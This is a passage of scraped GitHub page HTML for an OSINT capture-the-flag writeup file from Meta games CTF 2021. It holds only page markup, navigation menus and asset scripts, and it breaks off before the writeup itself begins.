src="https://github.githubassets.com/assets/app_assets_modules_github_ref-selector_ts-7bdefeb88a1a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/repositories-8093725f8825.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_clipboard-copy-element_dist_index_esm_js-node_modules_github_remo-8e6bec-232430bfe6da.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_decorators_js-node_modules_scroll-anchoring_di-e71893-cc1b30c51a28.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_diffs_blob-lines_ts-app_assets_modules_github_diffs_linkable-line-n-f96c66-97aade341120.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/diffs-3a64c1f69a81.js"></script>
<title>CTF-Writeups/Sugar we're goin up.md at 3dfbfc9f6d536f6f42758da711d280dfe61cf9d2 · palanioffcl/CTF-Writeups · GitHub</title>
<meta name="route-pattern" content="/:user_id/:repository/blob/*name(/*path)">
<meta name="current-catalog-service-hash" content="581425c0eaaa5e5e53c5b736f58a14dbe5d38b0be425901738ad0670bd1d5a33">
<meta name="request-id" content="E029:F4A8:54AAFC0:56FDAE4:64121C67" data-pjax-transient="true"/><meta name="html-safe-nonce" content="7685aa2ee075d3c1bb90bfa730c7a239410e0f464bbd2c018f437d6d117dfc4a" data-pjax-transient="true"/><meta name="visitor-payload" content="eyJyZWZlcnJlciI6IiIsInJlcXVlc3RfaWQiOiJFMDI5OkY0QTg6NTRBQUZDMDo1NkZEQUU0OjY0MTIxQzY3IiwidmlzaXRvcl9pZCI6IjU2MjUzMTQ1MjgzNDg3NDA3MTEiLCJyZWdpb25fZWRnZSI6ImZyYSIsInJlZ2lvbl9yZW5kZXIiOiJmcmEifQ==" data-pjax-transient="true"/><meta name="visitor-hmac" content="c0e67203de4a06be97dc9255f4248c7d234d05fc134c416ed62b96657686afc3" data-pjax-transient="true"/>
<meta name="hovercard-subject-tag" content="repository:426049755" data-turbo-transient>
<meta name="github-keyboard-shortcuts" content="repository,source-code,file-tree" data-turbo-transient="true" />
<meta name="selected-link" value="repo_source" data-turbo-transient>
<meta name="google-site-verification" content="c1kuD-K2HIVF635lypcsWPoD4kilo5-jA_wBFyT4uMY"> <meta name="google-site-verification" content="KT5gs8h0wvaagLKAVWq8bbeNwnZZK1r1XQysX3xurLU"> <meta name="google-site-verification" content="ZzhVyEFwb7w3e0-uOTltm8Jsck2F5StVihD0exw2fsA"> <meta name="google-site-verification" content="GXs5KoUUkNCoaAZn7wPN-t01Pywp9M3sEjnt_3_ZWPc"> <meta name="google-site-verification" content="Apib7-x98H0j5cPqHWwSMm6dNU4GmODRoqxLiDzdx9I">
<meta name="octolytics-url" content="https://collector.github.com/github/collect" />
<meta name="analytics-location" content="/<user-name>/<repo-name>/blob/show" data-turbo-transient="true" />
<meta name="user-login" content="">
<meta name="viewport" content="width=device-width"> <meta name="description" content="The Challenges which i solved in various CTFs can be seen here :) - CTF-Writeups/Sugar we're goin up.md at 3dfbfc9f6d536f6f42758da711d280dfe61cf9d2 · palanioffcl/CTF-Writeups"> <link rel="search" type="application/opensearchdescription+xml" href="/opensearch.xml" title="GitHub"> <link rel="fluid-icon" href="https://github.com/fluidicon.png" title="GitHub"> <meta property="fb:app_id" content="1401488693436528"> <meta name="apple-itunes-app" content="app-id=1477376905" /> <meta name="twitter:image:src" content="https://opengraph.githubassets.com/f7c95df364a3f5d08c61ded109ec3fced5134ab61893e049d19d5447e2d6c36f/palanioffcl/CTF-Writeups" /><meta name="twitter:site" content="@github" /><meta name="twitter:card" content="summary_large_image" /><meta name="twitter:title" content="CTF-Writeups/Sugar we're goin up.md at 3dfbfc9f6d536f6f42758da711d280dfe61cf9d2 · palanioffcl/CTF-Writeups" /><meta name="twitter:description" content="The Challenges which i solved in various CTFs can be seen here :) - CTF-Writeups/Sugar we're goin up.md at 3dfbfc9f6d536f6f42758da711d280dfe61cf9d2 · palanioffcl/CTF-Writeups" /> <meta property="og:image" content="https://opengraph.githubassets.com/f7c95df364a3f5d08c61ded109ec3fced5134ab61893e049d19d5447e2d6c36f/palanioffcl/CTF-Writeups" /><meta property="og:image:alt" content="The Challenges which i solved in various CTFs can be seen here :) - CTF-Writeups/Sugar we're goin up.md at 3dfbfc9f6d536f6f42758da711d280dfe61cf9d2 · palanioffcl/CTF-Writeups" /><meta property="og:image:width" content="1200" /><meta property="og:image:height" content="600" /><meta property="og:site_name" content="GitHub" /><meta property="og:type" content="object" /><meta property="og:title" content="CTF-Writeups/Sugar we're goin up.md at 3dfbfc9f6d536f6f42758da711d280dfe61cf9d2 · palanioffcl/CTF-Writeups" /><meta property="og:url" content="https://github.com/palanioffcl/CTF-Writeups" /><meta property="og:description" content="The Challenges which i solved in various CTFs can be seen here :) - CTF-Writeups/Sugar we're goin up.md at 3dfbfc9f6d536f6f42758da711d280dfe61cf9d2 · palanioffcl/CTF-Writeups" /> <link rel="assets" href="https://github.githubassets.com/">
<meta name="hostname" content="github.com">
<meta name="expected-hostname" content="github.com">
<meta name="enabled-features" content="TURBO_EXPERIMENT_RISKY,IMAGE_METRIC_TRACKING,GEOJSON_AZURE_MAPS">
<meta http-equiv="x-pjax-version" content="ef97471de14f8d2285f0269e8f0f7dc70845f693d3f6ccd2dd2daae5cd1bbebe" data-turbo-track="reload"> <meta http-equiv="x-pjax-csp-version" content="2a84822a832da97f1ea76cf989a357ec70c85713a2fd8f14c8421b76bbffe38c" data-turbo-track="reload"> <meta http-equiv="x-pjax-css-version" content="adfc12179419e463f9f320d07920b1684c9b7e060d4d9cd3a6cd5d0de37ce710" data-turbo-track="reload"> <meta http-equiv="x-pjax-js-version" content="711646ae23abb27cf728346f30f81c042d4428233a0795acf0e21ed664fe9d94" data-turbo-track="reload">
<meta name="turbo-cache-control" content="no-preview" data-turbo-transient="">
<meta data-hydrostats="publish">
<meta name="go-import" content="github.com/palanioffcl/CTF-Writeups git https://github.com/palanioffcl/CTF-Writeups.git">
<meta name="octolytics-dimension-user_id" content="84482008" /><meta name="octolytics-dimension-user_login" content="palanioffcl" /><meta name="octolytics-dimension-repository_id" content="426049755" /><meta name="octolytics-dimension-repository_nwo" content="palanioffcl/CTF-Writeups" /><meta name="octolytics-dimension-repository_public" content="true" /><meta name="octolytics-dimension-repository_is_fork" content="false" /><meta name="octolytics-dimension-repository_network_root_id" content="426049755" /><meta name="octolytics-dimension-repository_network_root_nwo" content="palanioffcl/CTF-Writeups" />
<link rel="canonical" href="https://github.com/palanioffcl/CTF-Writeups/blob/3dfbfc9f6d536f6f42758da711d280dfe61cf9d2/Meta%20games%20CTF%202021/OSINT/Sugar%20we're%20goin%20up.md" data-turbo-transient> <meta name="turbo-body-classes" content="logged-out env-production page-responsive page-blob">
<meta name="browser-stats-url" content="https://api.github.com/_private/browser/stats">
<meta name="browser-errors-url" content="https://api.github.com/_private/browser/errors">
<meta name="browser-optimizely-client-errors-url" content="https://api.github.com/_private/browser/optimizely_client/errors">
<link rel="mask-icon" href="https://github.githubassets.com/pinned-octocat.svg" color="#000000"> <link rel="alternate icon" class="js-site-favicon" type="image/png" href="https://github.githubassets.com/favicons/favicon.png"> <link rel="icon" class="js-site-favicon" type="image/svg+xml" href="https://github.githubassets.com/favicons/favicon.svg">
<meta name="theme-color" content="#1e2327"><meta name="color-scheme" content="light dark" />
<link rel="manifest" href="/manifest.json" crossOrigin="use-credentials">
</head>
<body class="logged-out env-production page-responsive page-blob" style="word-wrap: break-word;"> <div data-turbo-body class="logged-out env-production page-responsive page-blob" style="word-wrap: break-word;">
<div class="position-relative js-header-wrapper "> Skip to content <span> <span></span></span>
<script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-94fd67-04fa93bb158a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/sessions-9920eaa99f50.js"></script><header class="Header-old header-logged-out js-details-container Details position-relative f4 py-3" role="banner"> <button type="button" class="Header-backdrop d-lg-none border-0 position-fixed top-0 left-0 width-full height-full js-details-target" aria-label="Toggle navigation"> <span>Toggle navigation</span> </button>
<div class="container-xl d-flex flex-column flex-lg-row flex-items-center p-responsive height-full position-relative z-1"> <div class="d-flex flex-justify-between flex-items-center width-full width-lg-auto"> <svg height="32" aria-hidden="true" viewBox="0 0 16 16" version="1.1" width="32" data-view-component="true" class="octicon octicon-mark-github"> <path d="M8 0c4.42 0 8 3.58 8 8a8.013 8.013 0 0 1-5.45 7.59c-.4.08-.55-.17-.55-.38 0-.27.01-1.13.01-2.2 0-.75-.25-1.23-.54-1.48 1.78-.2 3.65-.88 3.65-3.95 0-.88-.31-1.59-.82-2.15.08-.2.36-1.02-.08-2.12 0 0-.67-.22-2.2.82-.64-.18-1.32-.27-2-.27-.68 0-1.36.09-2 .27-1.53-1.03-2.2-.82-2.2-.82-.44 1.1-.16 1.92-.08 2.12-.51.56-.82 1.28-.82 2.15 0 3.06 1.86 3.75 3.64 3.95-.23.2-.44.55-.51 1.07-.46.21-1.61.55-2.33-.66-.15-.24-.6-.83-1.23-.82-.67.01-.27.38.01.53.34.19.73.9.82 1.13.16.45.68 1.31 2.69.94 0 .67.01 1.3.01 1.49 0 .21-.15.45-.55.38A7.995 7.995 0 0 1 0 8c0-4.42 3.58-8 8-8Z"></path></svg>
<div class="flex-1"> Sign up </div>
<div class="flex-1 flex-order-2 text-right"> <button aria-label="Toggle navigation" aria-expanded="false" type="button" data-view-component="true" class="js-details-target Button--link Button--medium Button d-lg-none color-fg-inherit p-1"> <span> <span><div class="HeaderMenu-toggle-bar rounded my-1"></div> <div class="HeaderMenu-toggle-bar rounded my-1"></div> <div class="HeaderMenu-toggle-bar rounded my-1"></div></span> </span></button> </div> </div>
<div class="HeaderMenu--logged-out p-responsive height-fit position-lg-relative d-lg-flex flex-column flex-auto pt-7 pb-4 top-0"> <div class="header-menu-wrapper d-flex flex-column flex-self-end flex-lg-row flex-justify-between flex-auto p-3 p-lg-0 rounded rounded-lg-0 mt-3 mt-lg-0"> <nav class="mt-0 px-3 px-lg-0 mb-3 mb-lg-0" aria-label="Global"> <button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-3 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Product <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path></svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 py-2 py-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 d-lg-flex dropdown-menu-wide">
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-workflow color-fg-subtle mr-3"> <path d="M1 3a2 2 0 0 1 2-2h6.5a2 2 0 0 1 2 2v6.5a2 2 0 0 1-2 2H7v4.063C7 16.355 7.644 17 8.438 17H12.5v-2.5a2 2 0 0 1 2-2H21a2 2 0 0 1 2 2V21a2 2 0 0 1-2 2h-6.5a2 2 0 0 1-2-2v-2.5H8.437A2.939 2.939 0 0 1 5.5 15.562V11.5H3a2 2 0 0 1-2-2Zm2-.5a.5.5 0 0 0-.5.5v6.5a.5.5 0 0 0 .5.5h6.5a.5.5 0 0 0 .5-.5V3a.5.5 0 0 0-.5-.5ZM14.5 14a.5.5 0 0 0-.5.5V21a.5.5 0 0 0 .5.5H21a.5.5 0 0 0 .5-.5v-6.5a.5.5 0 0 0-.5-.5Z"></path></svg> <div> <div class="color-fg-default h4">Actions</div> Automate any workflow </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-package color-fg-subtle mr-3"> <path d="M12.876.64V.639l8.25 4.763c.541.313.875.89.875 1.515v9.525a1.75 1.75 0 0 1-.875 1.516l-8.25 4.762a1.748 1.748 0 0 1-1.75 0l-8.25-4.763a1.75 1.75 0 0 1-.875-1.515V6.917c0-.625.334-1.202.875-1.515L11.126.64a1.748 1.748 0 0 1 1.75 0Zm-1 1.298L4.251 6.34l7.75 4.474 7.75-4.474-7.625-4.402a.248.248 0 0 0-.25 0Zm.875 19.123 7.625-4.402a.25.25 0 0 0 .125-.216V7.639l-7.75 4.474ZM3.501 7.64v8.803c0 .09.048.172.125.216l7.625 4.402v-8.947Z"></path></svg> <div> <div class="color-fg-default h4">Packages</div> Host and manage packages </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-shield-check color-fg-subtle mr-3"> <path d="M16.53 9.78a.75.75 0 0 0-1.06-1.06L11 13.19l-1.97-1.97a.75.75 0 0 0-1.06 1.06l2.5 2.5a.75.75 0 0 0 1.06 0l5-5Z"></path><path d="m12.54.637 8.25 2.675A1.75 1.75 0 0 1 22 4.976V10c0 6.19-3.771 10.704-9.401 12.83a1.704 1.704 0 0 1-1.198 0C5.77 20.705 2 16.19 2 10V4.976c0-.758.489-1.43 1.21-1.664L11.46.637a1.748 1.748 0 0 1 1.08 0Zm-.617 1.426-8.25 2.676a.249.249 0 0 0-.173.237V10c0 5.46 3.28 9.483 8.43 11.426a.199.199 0 0 0 .14 0C17.22 19.483 20.5 15.461 20.5 10V4.976a.25.25 0 0 0-.173-.237l-8.25-2.676a.253.253 0 0 0-.154 0Z"></path></svg> <div> <div class="color-fg-default h4">Security</div> Find and fix vulnerabilities </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-codespaces color-fg-subtle mr-3"> <path d="M3.5 3.75C3.5 2.784 4.284 2 5.25 2h13.5c.966 0 1.75.784 1.75 1.75v7.5A1.75 1.75 0 0 1 18.75 13H5.25a1.75 1.75 0 0 1-1.75-1.75Zm-2 12c0-.966.784-1.75 1.75-1.75h17.5c.966 0 1.75.784 1.75 1.75v4a1.75 1.75 0 0 1-1.75 1.75H3.25a1.75 1.75 0 0 1-1.75-1.75ZM5.25 3.5a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h13.5a.25.25 0 0 0 .25-.25v-7.5a.25.25 0 0 0-.25-.25Zm-2 12a.25.25 0 0 0-.25.25v4c0 .138.112.25.25.25h17.5a.25.25 0 0 0 .25-.25v-4a.25.25 0 0 0-.25-.25Z"></path><path d="M10 17.75a.75.75 0 0 1 .75-.75h6.5a.75.75 0 0 1 0 1.5h-6.5a.75.75 0 0 1-.75-.75Zm-4 0a.75.75 0 0 1 .75-.75h.5a.75.75 0 0 1 0 1.5h-.5a.75.75 0 0 1-.75-.75Z"></path></svg> <div> <div class="color-fg-default h4">Codespaces</div> Instant dev environments </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-copilot color-fg-subtle mr-3"> <path d="M9.75 14a.75.75 0 0 1 .75.75v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 .75-.75Zm4.5 0a.75.75 0 0 1 .75.75v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 .75-.75Z"></path><path d="M12 2c2.214 0 4.248.657 5.747 1.756.136.099.268.204.397.312.584.235 1.077.546 1.474.952.85.869 1.132 2.037 1.132 3.368 0 .368-.014.733-.052 1.086l.633 1.478.043.022A4.75 4.75 0 0 1 24 15.222v1.028c0 .529-.309.987-.565 1.293-.28.336-.636.653-.966.918a13.84 13.84 0 0 1-1.299.911l-.024.015-.006.004-.039.025c-.223.135-.45.264-.68.386-.46.245-1.122.571-1.941.895C16.845 21.344 14.561 22 12 22c-2.561 0-4.845-.656-6.479-1.303a19.046 19.046 0 0 1-1.942-.894 14.081 14.081 0 0 1-.535-.3l-.144-.087-.04-.025-.006-.004-.024-.015a13.16 13.16 0 0 1-1.299-.911 6.913 6.913 0 0 1-.967-.918C.31 17.237 0 16.779 0 16.25v-1.028a4.75 4.75 0 0 1 2.626-4.248l.043-.022.633-1.478a10.195 10.195 0 0 1-.052-1.086c0-1.331.282-2.498 1.132-3.368.397-.406.89-.717 1.474-.952.129-.108.261-.213.397-.312C7.752 2.657 9.786 2 12 2Zm-8 9.654v6.669a17.59 17.59 0 0 0 2.073.98C7.595 19.906 9.686 20.5 12 20.5c2.314 0 4.405-.594 5.927-1.197a17.59 17.59 0 0 0 2.073-.98v-6.669l-.038-.09c-.046.061-.095.12-.145.177-.793.9-2.057 1.259-3.782 1.259-1.59 0-2.738-.544-3.508-1.492a4.323 4.323 0 0 1-.355-.508h-.344a4.323 4.323 0 0 1-.355.508C10.704 12.456 9.555 13 7.965 13c-1.725 0-2.989-.359-3.782-1.259a3.026 3.026 0 0 1-.145-.177Zm6.309-1.092c.445-.547.708-1.334.851-2.301.057-.357.087-.718.09-1.079v-.031c-.001-.762-.166-1.26-.43-1.568l-.008-.01c-.341-.391-1.046-.689-2.533-.529-1.505.163-2.347.537-2.824 1.024-.462.473-.705 1.18-.705 2.32 0 .605.044 1.087.135 1.472.092.384.231.672.423.89.365.413 1.084.75 2.657.75.91 0 1.527-.223 1.964-.564.14-.11.268-.235.38-.374Zm2.504-2.497c.136 1.057.403 1.913.878 2.497.442.545 1.134.938 2.344.938 1.573 0 2.292-.337 2.657-.751.384-.435.558-1.151.558-2.361 0-1.14-.243-1.847-.705-2.319-.477-.488-1.318-.862-2.824-1.025-1.487-.161-2.192.139-2.533.529-.268.308-.437.808-.438 1.578v.02c.002.299.023.598.063.894Z"></path></svg> <div> <div class="color-fg-default h4">Copilot</div> Write better code with AI </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-code-review color-fg-subtle mr-3"> <path d="M10.3 6.74a.75.75 0 0 1-.04 1.06l-2.908 2.7 2.908 2.7a.75.75 0 1 1-1.02 1.1l-3.5-3.25a.75.75 0 0 1 0-1.1l3.5-3.25a.75.75 0 0 1 1.06.04Zm3.44 1.06a.75.75 0 1 1 1.02-1.1l3.5 3.25a.75.75 0 0 1 0 1.1l-3.5 3.25a.75.75 0 1 1-1.02-1.1l2.908-2.7-2.908-2.7Z"></path><path d="M1.5 4.25c0-.966.784-1.75 1.75-1.75h17.5c.966 0 1.75.784 1.75 1.75v12.5a1.75 1.75 0 0 1-1.75 1.75h-9.69l-3.573 3.573A1.458 1.458 0 0 1 5 21.043V18.5H3.25a1.75 1.75 0 0 1-1.75-1.75ZM3.25 4a.25.25 0 0 0-.25.25v12.5c0 .138.112.25.25.25h2.5a.75.75 0 0 1 .75.75v3.19l3.72-3.72a.749.749 0 0 1 .53-.22h10a.25.25 0 0 0 .25-.25V4.25a.25.25 0 0 0-.25-.25Z"></path></svg> <div> <div class="color-fg-default h4">Code review</div> Manage code changes </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-issue-opened color-fg-subtle mr-3"> <path d="M12 1c6.075 0 11 4.925 11 11s-4.925 11-11 11S1 18.075 1 12 5.925 1 12 1ZM2.5 12a9.5 9.5 0 0 0 9.5 9.5 9.5 9.5 0 0 0 9.5-9.5A9.5 9.5 0 0 0 12 2.5 9.5 9.5 0 0 0 2.5 12Zm9.5 2a2 2 0 1 1-.001-3.999A2 2 0 0 1 12 14Z"></path></svg> <div> <div class="color-fg-default h4">Issues</div> Plan and track work </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-comment-discussion color-fg-subtle mr-3"> <path d="M1.75 1h12.5c.966 0 1.75.784 1.75 1.75v9.5A1.75 1.75 0 0 1 14.25 14H8.061l-2.574 2.573A1.458 1.458 0 0 1 3 15.543V14H1.75A1.75 1.75 0 0 1 0 12.25v-9.5C0 1.784.784 1 1.75 1ZM1.5 2.75v9.5c0 .138.112.25.25.25h2a.75.75 0 0 1 .75.75v2.19l2.72-2.72a.749.749 0 0 1 .53-.22h6.5a.25.25 0 0 0 .25-.25v-9.5a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25Z"></path><path d="M22.5 8.75a.25.25 0 0 0-.25-.25h-3.5a.75.75 0 0 1 0-1.5h3.5c.966 0 1.75.784 1.75 1.75v9.5A1.75 1.75 0 0 1 22.25 20H21v1.543a1.457 1.457 0 0 1-2.487 1.03L15.939 20H10.75A1.75 1.75 0 0 1 9 18.25v-1.465a.75.75 0 0 1 1.5 0v1.465c0 .138.112.25.25.25h5.5a.75.75 0 0 1 .53.22l2.72 2.72v-2.19a.75.75 0 0 1 .75-.75h2a.25.25 0 0 0 .25-.25v-9.5Z"></path></svg> <div> <div class="color-fg-default h4">Discussions</div> Collaborate outside of code </div>
Explore
All features
Documentation
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
GitHub Skills
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
Blog
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
</div>
<button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-3 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Solutions <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path></svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 py-2 py-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 px-lg-4"> For
Enterprise
Teams
Startups
Education
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
By Solution
CI/CD & Automation
DevOps
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
DevSecOps
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
Case Studies
Customer Stories
Resources
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
</div>
<button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-3 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Open Source <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path></svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 py-2 py-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 px-lg-4">
<div> <div class="color-fg-default h4">GitHub Sponsors</div> Fund open source developers </div>
<div> <div class="color-fg-default h4">The ReadME Project</div> GitHub community articles </div>
Repositories
Topics
Trending
Collections
</div>
Pricing
</nav>
<div class="d-lg-flex flex-items-center px-3 px-lg-0 mb-3 mb-lg-0 text-center text-lg-left"> <div class="d-lg-flex min-width-0 mb-2 mb-lg-0">
<div class="header-search flex-auto position-relative js-site-search flex-self-stretch flex-md-self-auto mb-3 mb-md-0 mr-0 mr-md-3 scoped-search site-scoped-search js-jump-to"> <div class="position-relative"> </option></form><form class="js-site-search-form" role="search" aria-label="Site" data-scope-type="Repository" data-scope-id="426049755" data-scoped-search-url="/palanioffcl/CTF-Writeups/search" data-owner-scoped-search-url="/users/palanioffcl/search" data-unscoped-search-url="/search" data-turbo="false" action="/palanioffcl/CTF-Writeups/search" accept-charset="UTF-8" method="get"> <label class="form-control header-search-wrapper input-sm p-0 js-chromeless-input-container header-search-wrapper-jump-to position-relative d-flex flex-justify-between flex-items-center"> <input type="text" class="form-control js-site-search-focus header-search-input jump-to-field js-jump-to-field js-site-search-field is-clearable" data-hotkey=s,/ name="q" 